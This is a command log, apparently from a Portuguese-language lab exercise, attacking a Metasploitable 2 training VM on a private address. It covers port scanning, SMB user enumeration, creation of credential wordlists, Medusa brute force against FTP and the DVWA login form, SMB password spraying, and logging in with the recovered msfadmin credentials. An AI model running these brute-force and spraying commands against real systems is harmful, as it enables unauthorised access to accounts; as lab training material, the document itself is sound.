# ========================================
# COMANDOS EXECUTADOS - MEDUSA + METASPLOITABLE 2
# ========================================

# 1. Ping + Verificação de conectividade e portas
ping 192.168.56.101
nmap -sV -p 21,22,80,139,445 192.168.56.101

# 2. Enumeração de usuários SMB
enum4linux -U 192.168.56.101

# 3. Criação das wordlists (executados um a um)
cat > wordlists/ftp_users.txt << EOF
msfadmin
root
user
postgres
service
EOF

cat > wordlists/ftp_pass.txt << EOF
msfadmin
password
123456
admin
user
EOF

cat > wordlists/dvwa_users.txt << EOF
admin
pablo
gordon
1337
smithy
EOF

cat > wordlists/dvwa_pass.txt << EOF
password
123456
admin
letmein
abc123
EOF

cat > wordlists/smb_users.txt << EOF
msfadmin
user
postgres
service
EOF

cat > wordlists/spraying.txt << EOF
msfadmin
password
123456
admin
user
service
postgres
EOF

# 4. Ataque de força bruta FTP
medusa -h 192.168.56.101 -U wordlists/ftp_users.txt -P wordlists/ftp_pass.txt -M ftp -T 10 -v 6

# 5. Ataque de força bruta no formulário DVWA (Low)
medusa -h 192.168.56.101 \
       -U wordlists/dvwa_users.txt \
       -P wordlists/dvwa_pass.txt \
       -M http \
       -m FORM:"http://192.168.56.101/dvwa/vulnerabilities/brute/" \
       -m FORM-DATA:"username=&password=&Login=Login" \
       -m DENY-SIGNAL:"Username and/or password incorrect." \
       -T 10 -v 6

# 6. Password Spraying SMB (poucas senhas em vários usuários)
medusa -h 192.168.56.101 \
       -U wordlists/smb_users.txt \
       -P wordlists/spraying.txt \
       -M smbnt \
       -T 10 \
       -t 3 \
       -F \
       -v 6

# 7. Prova de acesso SMB com credencial encontrada
smbclient //192.168.56.101/tmp -U msfadmin%msfadmin
